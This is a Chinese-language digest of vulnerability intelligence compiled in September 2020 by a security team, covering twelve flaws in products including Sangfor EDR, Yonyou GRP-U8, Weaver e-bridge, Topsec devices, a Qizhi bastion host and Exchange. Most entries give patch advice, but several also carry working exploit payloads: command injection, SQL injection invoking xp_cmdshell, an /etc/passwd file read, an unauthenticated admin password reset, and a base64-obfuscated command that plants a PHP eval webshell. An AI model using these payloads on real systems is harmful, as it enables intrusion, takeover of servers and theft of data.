001-2020 HW 截止2020年09月12日情报聚合.md

11.67 KB / 2021-07-17 00:01:30
    # 2020 HW 截止2020年09月12日情报聚合

**整理：**Blackhold@棱角安全团队(Edge Security Team)

**时间：**2020年09月12日

### 一、绿盟UTS综合威胁探针管理员任意登录

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。

**利用过程：**

逻辑漏洞,利用方式参考（[https://www.hackbug.net/archives/112.html](https://www.hackbug.net/archives/112.html)）

1. 修改登录数据包 `{"status":false,"mag":""} -> {"status":true,"mag":""}`
2. `/webapi/v1/system/accountmanage/account`接口逻辑错误泄漏了管理员的账户信息包括密码（md5）
3. 再次登录,替换密码上个数据包中md5密码。
4. 登录成功。

**加固建议:**

建议尽快更新补丁至最新： http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

绿盟官方已发布关于绿盟科技UTS产品受“管理员任意登录漏洞”影响的说明，详情：
[https://mp.weixin.qq.com/s/4gCLvwkGsxYL8TxV50T8ng](https://mp.weixin.qq.com/s/4gCLvwkGsxYL8TxV50T8ng)

### 二、[2020年09月新]深信服EDR3.2.21 任意代码执行

**漏洞描述：**

深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。 

深信服终端检测平台(EDR)在_3.2.21_版本中存在远程命令执行漏洞，该漏洞可被未经身份验证的攻击者利用，通过构造特定的HTTP请求绕过权限校验，从而获得目标服务器的权限，实现远程执行系统命令。

**影响版本：**

EDR <= v3.2.21

**利用EXP：**

```
{"params":"w=123\"'1234123'\"|命令"}
```

![-w1459](media/202009/15999238498818.jpg)


**加固建议：**

目前官方已有升级补丁：https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/100001594263233/undefined

### 三、用友GRP-u8 SQL注入

**漏洞描述：**

用友GRP-U8行政事业内控管理软件存在SQL注入漏洞，攻击者可利用该漏洞进行命令执行。

**影响版本：**

GRP-u8全版本

**利用EXP：**

```
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
 
 
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
**加固建议**

目前官方已在最新版本中修复了该漏洞，请受影响的用户尽快升级版本进行防护。官方网站：http://shyy.chinaetax.com.cn

### 四、泛微云桥 e-bridge 任意文件读取漏洞

**漏洞描述：**

根据互联网情报监测发现泛微云桥 e-bridge 2018–2019版本存在任意文件读取漏洞，攻击者可利用该漏洞读取服务器上的源代码等敏感信息。

**影响版本：**

2018 – 2019 版本

利用过程：

```
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*
```

```
GET /file/fileNoLogin/xxxxxxxxxx HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*
```

**加固建议：**

1. 使用官方发布的最新版本：http://wx.weaver.com.cn/download
2. 关闭程序路由 /file/fileNoLogin

### 五、天融信TopApp-LB 负载均衡系统sql注入 exp

**漏洞描述：**

根据互联网监测发现天融信TopApp-LB V1.2.8.0#xxx 存在sql漏洞，目前已有公开EXP在互联网流传。

**影响版本：**

V1.2.8.0#xxx[2014年]

**利用EXP：**

```
POST /acc/clsf/report/datasource.php HTTP/1.1
Host: 
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。 
```

**加固建议：**

目前官方已发布*关于TopAPP-LB产品旧版本存在SQL注入漏洞的说明：*https://mp.weixin.qq.com/s/5L6morcwlogurCtdhsiOcA

### 六、天融信数据防泄漏系统越权修改管理员密码

**漏洞描述：**

根据互联网监测发现天融信数据防泄漏系统(v3.1130.308p3_ DLP.1)存在越权修改管理员密码，攻击者可利用此漏洞获取管理员权限，从而登录系统进行恶意操作。

**影响版本：**

v3.1130.308p3_ DLP.1

**利用过程：**

无需登录权限,由于修改密码处未校验原密码,且`/?module=auth_user&action=mod_edit_pwd`

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。

```
POST /?module=auth_user&action=mod_edit_pwd 
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
```

### 七、齐治堡垒机前台远程命令执行漏洞（CNVD-2019-20835）

**漏洞描述：**

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司。

齐治运维堡垒机服务端存在命令执行漏洞，攻击者可利用该漏洞获取服务器权限。

**利用过程：**

未授权无需登录。

1. 访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".
2. 访问如下链接即可getshell，执行成功后，生成PHP一句话马
3. /var/www/shterm/resources/qrcode/lbj77.php  密码10086

```
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
```

**加固建议：**

该漏洞的修复补丁已发布，请关注厂商主页更新：https://www.shterm.com/

### 八、CVE-2020-16875: Exchange Server 远程代码执行漏洞

**漏洞描述：**

2020年09月09日，360CERT监测发现Microsoft Exchange 发布了Exchange命令执行漏洞 的风险通告，该漏洞编号为CVE-2020-16875 ，漏洞等级：严重，漏洞评分：9.1。

远程攻击者通过 构造特殊的cmdlet参数 ,可造成任意命令执行的影响。

对此，360CERT建议广大用户及时将Exchange 升级到最新版本。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。

**影响版本**

* microsoft:exchange_server_2016: cu16/cu17
* microsoft:exchange_server_2019: cu5/cu6

**利用过程：**

更新公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875

微软公告说的很明显,只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令。

* https://srcincite.io/pocs/cve-2020-16875.py.txt
* https://srcincite.io/pocs/cve-2020-16875.ps1.txt


```
researcher@incite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123### mspaint

researcher@incite:~$ ./poc.py 192.168.75.142 [email protected]:user123### mspaint
(+) logged in as [email protected]
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5
(+) triggered rce as SYSTEM!
```

**加固建议**

通用修补建议

通过如下链接自行寻找符合操作系统版本的漏洞补丁，并进行补丁下载安装。

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875

参考来源：https://blog.csdn.net/weixin_45728976/article/details/108537236

### 九、PAN-OS远程代码执行漏洞（CVE-2020-2040）

**漏洞描述：**

近日，绿盟科技监测到Palo Alto Networks（PAN）发布安全公告，披露了一个编号为CVE-2020-2040的严重漏洞，CVSS评分为9.8。该漏洞是PAN-OS上的一个缓冲区溢出漏洞，当启用了强制门户或配置了多重身份验证（MFA）时，未经身份验证的攻击者可通过向Captive Portal或Multi-Factor Authentication接口发送恶意请求进行利用，可能导致系统进程中断，并允许使用root特权在PAN-OS设备上执行任意代码。此漏洞利用难度低，且无需用户交互，请相关用户尽快采取措施进行防护。

PAN-OS是一个运行在Palo Alto Networks防火墙和企业VPN设备上的操作系统。

参考链接：

https://security.paloaltonetworks.com/CVE-2020-2040

**影响版本：**

* PAN-OS = 8.0.X
* 8.1.X < PAN-OS < 8.1.15
* 9.0.X< PAN-OS <9.0.9
* 9.1.X< PAN-OS <9.1.3

**利用过程：**

暂无详情

**加固建议：**

官方升级

目前官方已针对此漏洞发布了更新版本，请受影响的用户尽快升级至安全版本进行防护，官方更新指南：https://docs.paloaltonetworks.com/pan-os/10-0/pan-os-admin/software-and-content-updates/pan-os-software-updates.html

时防护措施

若相关用户暂时无法进行升级操作，可在内容更新版本8317中启用签名来阻止针对此漏洞的攻击。

参考来源：https://mp.weixin.qq.com/s/8Z6-86i8ae4O_Z5VU4vw_w

### 十、WPS Office 图片解析错误导致堆损坏

**漏洞描述：**

WPS Office是由Microsoft珠海的中国软件开发商金山软件开发的办公套件，适用于Microsoft Windows，macOS，Linux，iOS和Android。WPS Office由三个主要组件组成：WPS Writer，WPS Presentation和WPS Spreadsheet。个人基本版本可以免费使用。WPS Office软件中存在一个远程执行代码漏洞，是当Office软件在分析特制Office文件时不正确地处理内存中的对象时引起的。成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码。故障可能会导致拒绝服务。

**影响版本：**

11.2.0.9453

**漏洞详情：**

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

### 十一、Apache Cocoon XML外部实体注入漏洞CVE-2020-11991

**漏洞描述：**

9月11日Apache软件基金会发布安全公告，修复了Apache Cocoon XML外部实体注入漏洞（CVE-2020-11991）。

CVE-2020-11991与StreamGenerator有关，在使用StreamGenerator时，代码将解析用户提供的XML。攻击者可以使用包括外部系统实体在内的特制XML来访问服务器系统上的任何文件。

**影响版本：**

Apache Cocoon <= 2.1.12

**利用过程：**

暂无详情

**加固建议：**

目前厂商已在新版本修复该漏洞，用户应升级到：

Apache Cocoon 2.1.13最新版本

下载链接：https://cocoon.apache.org/

参考来源：https://mp.weixin.qq.com/s/vXNaULOnCUqZU2pAX9DW2A

### 十二、联软科技产品命令执行、任意文件上传漏洞

**漏洞描述：**

根据互联网情报获取到联软科技产品存在命令执行和任意文件上传漏洞，目前暂无该漏洞详情。

![-w581](media/202009/15999261018250.jpg)

**漏洞详情：**

暂无。

**附最近热议漏洞清单：**

![企业微信截图_529ff6aa-38e6-4f95-8fc6-2fc292b01652](media/202009/%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_529ff6aa-38e6-4f95-8fc6-2fc292b01652.png)